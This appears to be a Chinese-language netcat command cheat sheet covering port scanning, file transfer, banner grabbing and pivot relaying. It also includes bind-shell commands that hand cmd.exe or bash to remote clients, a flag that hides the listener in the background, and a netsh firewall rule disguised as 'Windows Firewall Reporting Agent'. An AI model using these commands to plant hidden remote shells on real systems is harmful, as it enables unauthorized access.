nc用法
NC 在客户端 和 服务器执行
---------------------------------------------------------------------------------------------------------------------------------------------------
执行命令 -l 表示在服务器端启用监听模式
-p 指定监听的端口
-e 指定允许远程客户端访问监听端口时执行的程序
例如:
在远程服务器端执行 NC -l -p 12345 -e cmd.exe //表示在(windows)服务器监听12345端口,如果远程客户端访问12345端口将会将本地cmd.exe反 弹给客户端执行。
nc -l -p 12345 -e /bin/bash //在(linux)服务器监听12345端口,如果远程客户端访问12345端口会将本地bash反弹给客户端执行。
在本地客户端执行 nc 服务器ip 12345 // 连接服务器的12345端口,如果服务器端指定连接时执行的程序,会将服务器端的cmd.exe等反弹给客户端。
---------------------------------------------------------------------------------------------------------------------------------------------------
其他命令
-d隐藏服务在后台运行
nc -l -p 12345 -e cmd.exe -d //隐藏窗口服务后台运行
0.71版本 -d 2 设置延迟2秒后执行命令
-L不断打开nc进程,不断开随时连接
nc -l -p 12345 -e cmd.exe -d -L
-k 服务器端允许多个客户端连接数
-n 不做域名解析
-v/-vv 显示详细信息
-z syn扫描 -r随机端口 -i 设置延迟扫描
nc -v 192.168.113.1 21,80,443
nc -v 192.168.113.1 1-200
nc -v 192.168.113.1 http
输出重定向
nc -l -p 12345 > test //输出到test
>> //追加到不覆盖原有内容
-u 使用udp模式
---------------------------------------------------------------------------------------------------------------------------------------------------
可以交互聊天
nc -n -l -u -p 53
nc -n -u ip 53
--------------------------------------------------------------------------------------------------------------------------------------------------
文件传输
远程服务端 nc -l -p 12345 < test.txt //远程服务器端执行,将服务器端test.txt发送给客户机
本地客户机 nc ip 12345 > test.txt //客户端执行,连接服务器获取test.txt
本地做服务器 nc -l -p 12345 > test.txt
远程客户机 nc ip 12345 < test.txt
-w 2 传输完成后2秒后断开
-o test 抓包保存至test
---------------------------------------------------------------------------------------------------------------------------------------------------
获取信息,下载
nc ip 22 //获取某ip的ssh服务信息
nc 域名 port
GET / HTTP/1.0
HEAD / HTTP/1.0 获取服务信息 两次回车
---------------------------------------------------------------------------------------------------------------------------------------------------
跳板
A主机 nc b_ip 33333 //第三步连接b主机33333端口相当于访问c主机55555端口
B主机 nc -l -p 33333 | nc c_ip 55555 //第二步B主机连接C主机55555端口并通过管道转至本机通过33333端口监听
C主机 nc -l -p 55555 //第一步在C主机监听55555端口
----------------------------------------------------------------------------------------------------------------------------------------------------
netsh firewall show opmode 显示防火墙工作模式
netsh firewall set opmode mode = enable exceptions =enable profile =all
netsh firewall add portopening tcp 1234 "Windows Firewall Reporting Agent" enable all
netsh firewall show portopening
最新文章
- Release Management 安装 之 集成TFS
- layout_weight详解
- Urllib2 总结
- Python的包管理工具--PIP安装使用
- html利用锚点实现定位代码实例
- curl http认证
- 研究 UIActivityViewController
- 实现自己的http server - loop_in_codes - C++博客
- Linux查看CPU和内存使用情况 【转】
- LeetCode(28)-Remove Duplicates from Sorted Array
- 容器中的诊断与分析2——live diagnosis——perf
- <!--#include virtual='head.html'-->代码复用
- Linux下0号进程的前世(init_task进程)今生(idle进程)----Linux进程的管理与调度(五)【转】
- Confluence 6 数据导入和导出
- Mac下多版本JDK安装
- js中常用事件
- tomcat8.5之后版本,远程无法登录管理页面
- python-flask-session和scoped_session区别
- web.xml配置重理解
- [ES]ES集群内容灾